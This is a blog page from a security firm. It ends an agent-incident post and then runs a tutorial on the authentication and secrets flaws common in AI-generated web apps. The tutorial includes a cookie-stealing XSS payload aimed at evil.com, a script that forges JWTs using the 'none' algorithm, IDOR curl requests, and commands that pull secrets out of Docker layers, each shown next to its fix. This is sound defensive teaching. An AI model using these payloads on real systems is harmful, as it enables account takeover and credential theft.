I am also going to stop treating doctor --fix as a single-step recovery. It is a diagnostic that occasionally also writes a fix. The actual gate has to be re-running openclaw gateway status afterward and reading the output.

Hermes stays attached to this box with file and exec scopes pre-approved. The whole point of the setup is that when things break at 10:25, I am not also wiring up tool permissions at 10:26.

And the backup naming needs work. openclaw.json.agenth-bak-20260521-103255 is sensible, but I want those files dropping into ~/.openclaw/backups/ rather than sitting next to the live config.

If you are running OpenClaw yourself, the Security Hardening Guide I wrote earlier this spring is still the right baseline. Nothing in this morning’s incident changed those recommendations. It just reinforced why a read-only AI that cannot touch the artifact does not belong anywhere near your recovery loop.


Setup Notes

For anyone reproducing or comparing:

  • OpenClaw 2026.5.19 on a Raspberry-class Linux host
  • Gateway on port 18789, controlled from the OpenClaw web UI
  • Hermes-Agent v0.12.0 on the gpt-5.5 backend with 272K context, configured against my standard skill stack
  • Original ~/.openclaw/openclaw.json preserved as openclaw.json.agenth-bak-20260521-103255 for forensic comparison

One line of JSON, and a reminder that the AI you trust in an incident has to be allowed to read the file.

Stay paranoid. Read the source. Keep the backup.

Further Reading:

Questions or feedback? Reach out via:

Need help hardening your AI agent deployment? VULNEX offers:

  • AI agent security assessments (skill auditing, prompt injection testing, configuration reviews)
  • Red team engagements (AI-powered attack simulations)
  • Security automation and agentic-ops consulting
  • Custom security tool development

Contact: info@vulnex.com

Posted in AI, Technology | Tagged , , , , | Leave a comment

Authentication & Secrets: What AI Gets Wrong Every Time (Part 5)

Vibe Coding Security Series

  1. What Is Vibe Coding Security? A Field Guide for 2026
  2. The OWASP Top 10 for Vibe-Coded Applications
  3. Anatomy of a Vibe Coding Breach: Lessons from 2026’s Worst Incidents
  4. The Dependency Trap: Supply Chain Risks in AI-Generated Code
  5. Authentication & Secrets: What AI Gets Wrong Every Time (you are here)
  6. [Scanning Vibe-Coded Apps: Why Traditional SAST/DAST Falls Short] (https://simonroses.com/2026/05/scanning-vibe-coded-apps-why-traditional-sast-dast-falls-short-part-6/)
  7. Prompt Engineering for Secure Code
  8. The Founder’s Security Checklist (coming soon)
  9. Securing the AI Coding Pipeline (coming soon)
  10. The Future of Vibe Coding Security (coming soon)

Read Time: 22 minutes

TL;DR

Authentication and secrets management is where AI-generated code fails most consistently and most dangerously. In 67 lines of a demo app I built for a security conference, the AI produced hardcoded JWT secrets, MD5 password hashing, tokens that never expire, XSS vulnerabilities, and zero rate limiting — all in a working application that looks completely normal to a non-security person. GitGuardian found 29 million hardcoded secrets on GitHub in 2025, a 34% year-over-year jump, with AI-assisted commits leaking secrets at more than double the rate of human-written code. Inigra’s Q1 2026 audit of over 200 vibe-coded applications found that 91.5% contained at least one security vulnerability traceable to AI-generated code. And when Lovable — one of the biggest vibe coding platforms — got hit with a BOLA vulnerability in April 2026, five API calls from a free account were enough to access any other user’s source code, database credentials, and customer data. This post dissects the four patterns that AI gets wrong every single time — hardcoded secrets, client-side auth, broken JWT handling, and missing access controls — and ends with a 20-item checklist you can run against your app right now.


Why Auth Is Where It Breaks

You can ship a vibe-coded app with a CSS bug and nobody gets hurt. Ship it with a broken authentication flow, and everything behind the login is exposed. Auth isn’t just another feature — it’s the boundary between “my data” and “everyone’s data.” And it’s the thing AI coding tools handle worst.

It comes down to training data. AI models learned to code from public repositories, Stack Overflow answers, and tutorials. Those examples simplify authentication for clarity: hardcoded secrets so the reader can focus on the JWT logic, MD5 hashing because the tutorial isn’t about password security, no token expiration because it’s a demo. When a vibe coder prompts “add user authentication to my app,” the AI reproduces these patterns — not because it’s stupid, but because that’s what most of its training examples look like.

The code works. The login form appears. The JWT authenticates. The protected routes reject unauthenticated users. Every functional test passes. And any attacker with browser DevTools can walk right through it.

At VULNEX, authentication is the first thing we check in every assessment. In vibe-coded applications, it’s where we find the most critical issues — and it’s where five minutes of review would have prevented the most damage.


QuickNote: 67 Lines of AI-Generated Insecurity

To show this at a security conference, I built a demo. I prompted an AI coding tool to create a note-taking app — user registration, login, CRUD operations. Simple full-stack app, Node.js and Express. The prompt ended with something every vibe coder has thought at some point: “Skip security best practices for now — I’ll review them later.”

The AI generated 67 lines of backend code and 49 lines of frontend. A working app. Clean structure. You could demo it and it would look professional. What follows is what it actually produced — and every vulnerability here is something I find in real production vibe-coded applications.

The Hardcoded Secret

const SECRET = "insecure_secret_key";

Line 19. The JWT signing secret — the single piece of data that prevents anyone from forging authentication tokens — is a hardcoded string sitting in the source code. Not an environment variable. Not a secrets manager. A string literal, visible in the source, that would survive into version control, Docker images, and deployment bundles.

If you know this string, you can generate valid JWT tokens for any user. Full account takeover, no password required.

The fix:

const SECRET = process.env.JWT_SECRET; // loaded from environment, never in source

One line. That’s the difference between “anyone can forge tokens” and “tokens are cryptographically secure.” The value comes from a .env file (which is in .gitignore) or a secrets manager in production.

The Broken Hash

function hashPassword(password) {
  return crypto.createHash('md5').update(password).digest('hex');
}

MD5. No salt. Every instance of the password “admin123” produces the same hash across every user, every time. Rainbow table attacks crack these in seconds. MD5 has been considered broken for password hashing since the mid-2000s. But it shows up in AI-generated code constantly, because it’s simple and it appeared in thousands of tutorials the model trained on.

The AI picked the approach from the tutorial, not the approach from production.

The fix:

const bcrypt = require('bcrypt');
async function hashPassword(password) {
  return bcrypt.hash(password, 12); // per-user salt, 12 rounds
}

bcrypt generates a unique salt per user automatically and is deliberately slow — that slowness is the point. How slow? MD5 hashes a password in roughly one microsecond (0.000001 seconds) in Node.js. bcrypt at 12 rounds takes about 0.3 seconds. That’s a 300,000x difference. A password database of 10,000 users hashed with MD5 — no salt, so you only need to hash each candidate password once — can be fully cracked against the rockyou.txt wordlist (14.3 million entries) in under a minute. The same database with bcrypt? Each user has a unique salt, so you rehash all 14.3 million candidates per user. On a 10-core CPU, that’s roughly 136 years. GPU-based cracking rigs shorten this significantly — but even a high-end GPU cluster brings it down to years, not minutes. That’s the math behind “use bcrypt.”

The Immortal Token

const token = jwt.sign({ id: user.id, username: user.username }, SECRET);

No expiration. This JWT is valid forever. Once issued, it never needs to be refreshed. If it’s intercepted, stolen, or leaked, it provides permanent access to the account. No expiresIn parameter. No refresh token mechanism. No way to invalidate a compromised session.

The fix:

const token = jwt.sign(
  { id: user.id, username: user.username },
  process.env.JWT_SECRET,
  { expiresIn: '1h' }  // token dies in one hour
);

One option object. That’s what separates “permanent access if stolen” from “one-hour window.”

The XSS Injection Point

notes.innerHTML = data.map(n => `
<li>${n.content}</li>`).join('');

On the frontend, note content is injected directly into the DOM via innerHTML with zero sanitization. Store <script>document.location='https://evil.com/steal?cookie='+document.cookie</script> as a note, and every time the page renders, the script executes. In a multi-user context, this is stored XSS — the most dangerous variant.

The fix:

notes.textContent = ''; // clear safely
data.forEach(n => {
  const li = document.createElement('li');
  li.textContent = n.content; // textContent escapes HTML automatically
  notes.appendChild(li);
});

textContent instead of innerHTML. The browser treats the content as text, not executable markup. No sanitization library needed.

What’s Missing

Beyond what’s in the code, look at what isn’t: no rate limiting on login, no HTTPS enforcement, no CORS configuration, no input validation on the registration endpoint, no password complexity requirements, no account lockout, no logging of auth events.

The rate limiting gap deserves numbers. Without it, an attacker can send login requests as fast as the server responds — easily 100+ per second against a typical Express app. The rockyou.txt wordlist contains 14.3 million passwords. At 100 requests/second, that’s 39 hours to try every single one. But most users pick common passwords: the top 1,000 most common passwords cover roughly 14% of all accounts. At 100 requests/second, those 1,000 attempts take ten seconds. Ten seconds to compromise one in seven accounts — because the AI didn’t add express-rate-limit, a five-line middleware.

Every one of these is a vulnerability. The AI produced all of them in 67 lines. And the app works — which is exactly why nobody catches them until it’s too late.


Pattern 1: Hardcoded Secrets — The Problem at Scale

QuickNote’s const SECRET = "insecure_secret_key" is one line in one demo. The problem is that this exact pattern repeats across millions of repositories.

The Numbers

GitGuardian’s State of Secrets Sprawl 2026 report found 29 million hardcoded secrets on GitHub in 2025 — a 34% year-over-year increase and the largest single-year jump they’ve ever recorded. AI-service credentials specifically surged 81%, with 1.27 million AI-related tokens exposed.

The vibe coding connection is direct: GitGuardian measured that Claude Code-assisted commits leaked secrets at 3.2% compared to 1.5% for the baseline across all public commits — more than double the rate. The AI doesn’t distinguish between “this is a value I should externalize” and “this is a value the code needs.” It puts the API key where the code works, which is inline.

Your .env Isn’t Safe Either

You’d think the fix is simple — put secrets in .env and keep them out of code. But Knostic’s research showed that tools like Cursor and Copilot actively read .env files during context building, effectively exposing secrets to the model’s cloud API. The secret you carefully put in an environment variable gets pulled into the AI’s context window, and can end up reproduced in generated code elsewhere.

So the AI reads your secrets from .env, and then hardcodes them into the next file it generates. The pattern feeds itself.

It gets worse at deployment. AI tools frequently generate Dockerfiles that copy the entire project directory into the image, including .env:

COPY . /app          # copies everything, including .env
RUN npm install

Even if you later delete .env inside the container, Docker images are layered. The file persists in the earlier layer. Anyone who pulls the image can extract it:

docker history --no-trunc 
<image>
docker save 
<image> | tar -xf - -C /tmp/layers
# grep through layers for secrets
grep -r "API_KEY\|SECRET\|DATABASE_URL" /tmp/layers/

The fix is a .dockerignore file that excludes .env, node_modules, and any other sensitive files — and passing secrets at runtime via Docker secrets or environment injection. But AI-generated Dockerfiles almost never include a .dockerignore. They optimize for “build succeeds,” not “build is secure.”

Real Consequences

In March 2026, a developer got an $82,314 bill after a Google API key embedded in their website’s frontend JavaScript was stolen. The key was originally created for Google Maps — low-risk, public by design. But when Google launched Gemini, existing Maps keys silently gained access to Gemini endpoints. Attackers found the exposed key, automated requests against Gemini Pro, and ran up $82K in 48 hours. The developer’s normal monthly spend was $180. This is the exact pattern vibe-coded apps reproduce at scale: API keys embedded in client-side JavaScript, visible to anyone who opens the page source.

And leaked secrets don’t get cleaned up. GitGuardian found that 64% of secrets detected in 2022 were still valid and unrevoked in 2026. When an AI puts a key in your frontend bundle and that bundle ships to a CDN, the key is public forever — unless you revoke and rotate, which most teams don’t.

What to Check

Run Gitleaks or TruffleHog against your codebase right now. Search for hardcoded strings that look like API keys, database connection strings, or JWT secrets. Check your frontend bundle — anything in client-side JavaScript is public. If you find secrets, revoke them immediately, rotate to new credentials, and move them to environment variables or a secrets manager.


Pattern 2: Client-Side Authentication — The Unlocked Door

The Pattern

This is the Enrichlead pattern from Part 3 at industrial scale. AI coding tools consistently place authentication and authorization checks in frontend code where they’re trivially bypassed. The paywall is a conditional render in React. The admin panel is hidden by a CSS class. The API endpoint exists and works — the frontend just doesn’t show the button to unauthenticated users.

The Data

Wiz’s research on vibe-coded applications identified four systemic misconfiguration patterns, and client-side authentication led the list. Their findings: AI tools generate auth logic that optimizes for the user experience — showing and hiding UI elements — without implementing corresponding server-side enforcement. The result is applications where every protected feature is one curl command away from being accessed by anyone.

Inigra’s Q1 2026 audit of over 200 vibe-coded applications found that 91.5% contained at least one security vulnerability traceable to AI-generated code, with over 60% exposing hardcoded credentials. The Lovable platform — one of the most popular vibe coding tools, valued at $6.6 billion with eight million users — was at the center of multiple security incidents in early 2026, with researchers finding that over 170 apps built on the platform had Supabase tables queryable by anyone holding the public anon key.

A significant portion of these involved Supabase misconfigurations. Here’s what typical AI-generated Supabase code looks like:

-- What the AI generates (WRONG):
CREATE TABLE notes (
  id SERIAL PRIMARY KEY,
  user_id UUID REFERENCES auth.users,
  content TEXT
);
-- No RLS policy. Any authenticated user can read/write all rows.
-- With the anon key, even unauthenticated users can access the table.
-- What it should generate:
CREATE TABLE notes (
  id SERIAL PRIMARY KEY,
  user_id UUID REFERENCES auth.users,
  content TEXT
);
ALTER TABLE notes ENABLE ROW LEVEL SECURITY;

CREATE POLICY "Users can only access their own notes"
  ON notes FOR ALL
  USING (auth.uid() = user_id)
  WITH CHECK (auth.uid() = user_id);

Four lines of SQL. That’s the difference between “anyone can read your database” and “users can only see their own rows.” The AI skips ENABLE ROW LEVEL SECURITY and the policy because it doesn’t need them for the code to work. The Supabase anon key, which is designed to be public, often gets confused with the service_role key, which absolutely must not be public. The AI doesn’t know the difference. It uses whichever key makes the code work.

Why AI Does This

The AI optimizes for what you asked. “Add authentication to my app” means “show a login screen and protect the routes.” The AI delivers exactly that — on the frontend. It doesn’t spontaneously add server-side middleware, because you didn’t ask for middleware. It doesn’t implement RBAC, because you asked for authentication, not authorization. It produces the minimum viable implementation of what you described, and the minimum viable implementation of “authentication” is a client-side check.

This is the invisible decision surface from the Field Guide. The AI decided where to put the auth check, decided not to add server-side validation, decided to use the anon key instead of implementing proper RLS policies. The developer never saw any of those decisions. The app worked, so they moved on.

What to Check

Open your browser’s network tab. Can you make API requests directly, bypassing the frontend? If your API returns data without validating a server-side session or token, your auth is client-side only. Test every endpoint — not just the ones the UI exposes. Try accessing admin endpoints as a regular user. Try accessing other users’ data by modifying IDs in requests. If any of these work, you have a client-side auth problem.


Pattern 3: Broken JWT & Session Management

The Standard Failures

JWT is the default auth mechanism for AI-generated code. The AI reaches for it because it’s stateless, well-documented, and appears in thousands of training examples. But the implementations are consistently broken in the same ways:

No expiration. The QuickNote example sets no expiresIn parameter. The token is valid forever. I see this in roughly half the vibe-coded applications I review — the AI generates the jwt.sign() call and doesn’t add the expiry option because the tutorial it learned from didn’t include one.

Weak or hardcoded signing secrets. “secret”, “my_jwt_secret”, “insecure_secret_key” — these show up verbatim in production applications. The AI pulls them from its training data, where they were placeholder values in documentation. A weak signing secret means anyone can forge tokens.

The “none” algorithm. JWT supports an algorithm called none that produces unsigned tokens — designed for development environments where signature verification adds overhead. AI tools occasionally generate JWT implementations that accept the none algorithm, or that include it in an allowed algorithms array. Here’s how the attack works in practice:

# Step 1: Take a legitimate JWT and split it into its three parts (header.payload.signature)
TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJ1c2VyIn0.signature_here"

# Step 2: Create a new header with alg set to "none"
echo -n '{"alg":"none","typ":"JWT"}' | base64 -w 0 | tr -d '=' | tr '/+' '_-'
# Output: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0

# Step 3: Modify the payload (e.g., change user ID to admin's ID)
echo -n '{"id":1,"username":"admin"}' | base64 -w 0 | tr -d '=' | tr '/+' '_-'
# Output: eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiJ9

# Step 4: Concatenate with an empty signature
FORGED="eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiJ9."

# Step 5: Use it
curl -H "Authorization: Bearer $FORGED" https://target.com/api/admin/users

Five commands. No secret needed. If the server accepts it, you have full admin access. The fix is to always specify the allowed algorithm explicitly in the verification call — jwt.verify(token, secret, { algorithms: ['HS256'] }) — so the server rejects any token that claims to use a different algorithm.

No token invalidation. AI-generated auth rarely implements token revocation, refresh token rotation, or session invalidation. If a user changes their password, their old tokens still work. If an admin needs to force-logout a user, there’s no mechanism to do it.

OAuth and Social Login: The Deceptive Shortcut

“Add Google login to my app” feels like the safe choice — let Google handle the hard parts. But AI-generated OAuth implementations introduce their own failures. The most common: missing the state parameter (which prevents CSRF attacks on the login flow), skipping PKCE (Proof Key for Code Exchange, now mandatory under OAuth 2.1), and storing access tokens client-side in JavaScript variables or localStorage where any XSS vulnerability can steal them.

The AI generates the OAuth flow that works in the happy path — user clicks “Sign in with Google,” gets redirected, comes back authenticated. But the security properties of OAuth depend on implementation details that the AI consistently omits, because the tutorials it trained on omit them too.

The Compounding Problem

These failures compound. A token that never expires, signed with a guessable secret, using a library that accepts the none algorithm — that’s not one vulnerability, it’s an open door with the key taped to the frame. And because JWT is stateless by design, there’s no server-side session to inspect or revoke. The token is the session. If the token is compromised, the session is compromised until the signing secret itself is rotated, which invalidates every active session for every user.

What to Check

Decode one of your JWTs at jwt.io. Does it have an exp claim? If not, your tokens never expire. Check your signing secret — is it a short, guessable string, or a properly generated key? Test whether your API accepts tokens signed with the none algorithm. And check whether changing a user’s password invalidates their existing tokens.


Pattern 4: Missing Access Controls — When Everyone Is Admin

The Pattern

Even when AI gets authentication right — user can log in, token is validated server-side, session has an expiration — it almost never implements proper authorization. Authentication answers “who are you?” Authorization answers “what are you allowed to do?” AI handles the first question. It ignores the second.

The typical AI-generated app has two roles: logged in and not logged in. That’s it. No admin vs. regular user distinction. No resource-level permissions. No row-level access controls beyond basic “your user ID matches the record’s user ID” checks — and even those are inconsistent.

Insecure Direct Object References (IDOR)

This is the most common access control failure in vibe-coded apps. The API uses sequential integer IDs: /api/notes/1, /api/notes/2, /api/notes/3. The AI generates endpoints that fetch records by ID without verifying that the requesting user owns that record. Here’s the full attack:

# Authenticate as User A (user ID: 42)
TOKEN=$(curl -s -X POST https://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"email":"usera@test.com","password":"password123"}' \
  | jq -r '.token')

# Access User A's own notes — the endpoint fetches notes by user ID
curl -H "Authorization: Bearer $TOKEN" https://target.com/api/users/42/notes
# {"notes": [{"id": 101, "content": "User A's private note"}]}

# Now request User B's notes (user ID: 43) — same token, different user ID in the URL
curl -H "Authorization: Bearer $TOKEN" https://target.com/api/users/43/notes
# {"notes": [{"id": 205, "content": "User B's private note"}]}  ← IDOR

Three requests. User A’s token gives access to User B’s notes because the endpoint checks authentication (“is this a valid token?”) but not authorization (“does this token belong to user 43?”). The user ID in the URL controls whose data is returned, and the server never verifies it matches the authenticated user.

The QuickNote app actually gets this one partially right — it scopes the notes query by userId. But many AI-generated apps don’t. And even QuickNote doesn’t prevent a user from modifying or deleting someone else’s notes if they know the note ID, because the update and delete operations (which the AI didn’t even generate — a missing feature that itself is a security gap) wouldn’t necessarily include the ownership check.

Real Case: The Lovable BOLA Breach

In April 2026, security researchers disclosed a Broken Object Level Authorization (BOLA) vulnerability in Lovable — the $6.6 billion vibe coding platform. The /projects/{id}/* API endpoints verified Firebase authentication tokens but skipped ownership checks entirely. Five API calls from a free account were enough to access any other user’s source code, database credentials, AI chat histories, and customer data. Every project created before November 2025 was exposed. Researchers found data from employees at Nvidia, Microsoft, Uber, and Spotify in the accessible projects.

This is Pattern 4 in its purest form. Authentication worked — you needed a valid Firebase token. Authorization was absent — that valid token let you read anyone’s data. The platform left the vulnerability open for 48 days after the initial bug report, closed follow-up reports as duplicates, and initially called the exposed data “intentional behavior.”

The Lovable breach is worth studying because it didn’t happen in someone’s side project. It happened in the platform itself — the tool that millions of vibe coders trust to generate their applications. If the platform can’t get authorization right, what are the odds the apps built on it will?

Why AI Misses This

Authorization is inherently contextual. It depends on business logic — who should see what, who can edit what, what actions require elevated privileges. The AI can’t infer your business rules from a prompt like “build a note-taking app.” It gives you the simplest working implementation: authenticated users can access their own data. Anything more complex — admin roles, team-based access, shared resources with granular permissions — requires explicit design that the vibe coder never specified.

This is one of the places where the gap between “working app” and “secure app” is widest. The app works for every user in isolation. It only breaks when one user tries to access another’s data — a test case that vibe coders almost never run, because they’re testing their own features, not testing against other users.

What to Check

Log in as User A. Try to access User B’s resources by manipulating IDs, parameters, or API paths. If any cross-user access succeeds, you have IDOR. Check whether admin endpoints require an admin role or just a valid token. Check whether sensitive operations (delete account, change email, export data) have additional authorization requirements beyond basic authentication.


The Auth & Secrets Checklist

Run this against your vibe-coded application before you ship. Every item maps back to a pattern above.

Secrets:

  1. No API keys, tokens, or credentials in source code — run gitleaks detect --source . or trufflehog filesystem .
  2. All secrets loaded from environment variables or a secrets manager — grep -r "const.*=.*['\"]sk-\|key\|secret\|password" src/
  3. Frontend JavaScript contains zero secrets — inspect your built bundle: grep -r "API_KEY\|SECRET\|Bearer" dist/
  4. .env files are in .gitignore — verify they’ve never been committed: git log --all --diff-filter=A -- '*.env'
  5. Database credentials use least-privilege accounts — not the root/admin connection string

Authentication:

  1. All auth checks enforced server-side — curl -X GET https://yourapp.com/api/protected without a token. If it returns data, your auth is broken
  2. Passwords hashed with bcrypt or Argon2 — not MD5, not SHA-256 without salt
  3. JWT tokens include exp claim — decode your token at jwt.io and check the payload
  4. JWT signing secret is at least 256 bits of randomness — node -e "console.log(require('crypto').randomBytes(32).toString('hex'))" generates a proper one
  5. Login endpoint has rate limiting — for i in $(seq 1 100); do curl -s -o /dev/null -w "%{http_code}\n" -X POST https://yourapp.com/api/login -d '{"email":"test@test.com","password":"wrong"}'; done — if you never get a 429, you have no rate limiting

Authorization:

  1. Every API endpoint checks user permissions — not just authentication
  2. Resource access verifies ownership — log in as User A, then `curl -H “Authorization: Bearer ” https://yourapp.com/api/resources/` — if it returns User B’s data, you have IDOR
  3. Admin functions require admin role — test admin endpoints with a regular user’s token
  4. Sensitive operations require re-authentication or step-up verification

OAuth (if using social login):

  1. OAuth flow includes state parameter for CSRF protection
  2. PKCE is enabled (check for code_verifier and code_challenge in the auth request)
  3. Access tokens are stored server-side, not in localStorage or JavaScript variables

Session Management:

  1. Tokens expire within a reasonable window (hours, not never)
  2. Password changes invalidate existing sessions
  3. A mechanism exists to force-revoke compromised tokens

This isn’t a complete security assessment. But if your vibe-coded app fails any of these 20 items, you have a critical vulnerability that needs fixing before launch. I’ll expand this into a full founder’s checklist in Part 8 of this series.


What You Should Take From This

The QuickNote demo is 67 lines. Your app is probably thousands. Every line of AI-generated authentication code carries the same risks I showed here — hardcoded secrets, client-side checks, broken sessions, missing access controls. The Lovable breach proved this isn’t theoretical. The Enrichlead founder from Part 3 thought he’d review security later. He was shutting down within a week.

Run the checklist above today, not after launch. Every jwt.sign() call, every password hash, every auth middleware the AI produces needs a manual look — is this check happening on the server, is this secret externalized, does this token expire, does this endpoint verify authorization and not just authentication? Those questions take seconds per function, and they’re the difference between a working demo and a secure application.

At VULNEX, auth issues appear in virtually every vibe-coded application we review — and they’re almost always the highest-severity findings. My workflow: run Gitleaks against the repo, check the frontend bundle for exposed keys, test every API endpoint without the frontend, decode the JWTs. I run dependencies through npmscan and cross-reference with Snyk’s vulnerability database — the auth-related libraries are always the first I check.

The AI will build you a login screen that looks professional and works in a demo. Getting it to build authentication that holds up against an actual attacker requires human judgment and the discipline to review before you ship.

As always: trust nothing, verify everything.


Further Reading


References

Posted in AI, Security, Technology | Tagged , , , , | Leave a comment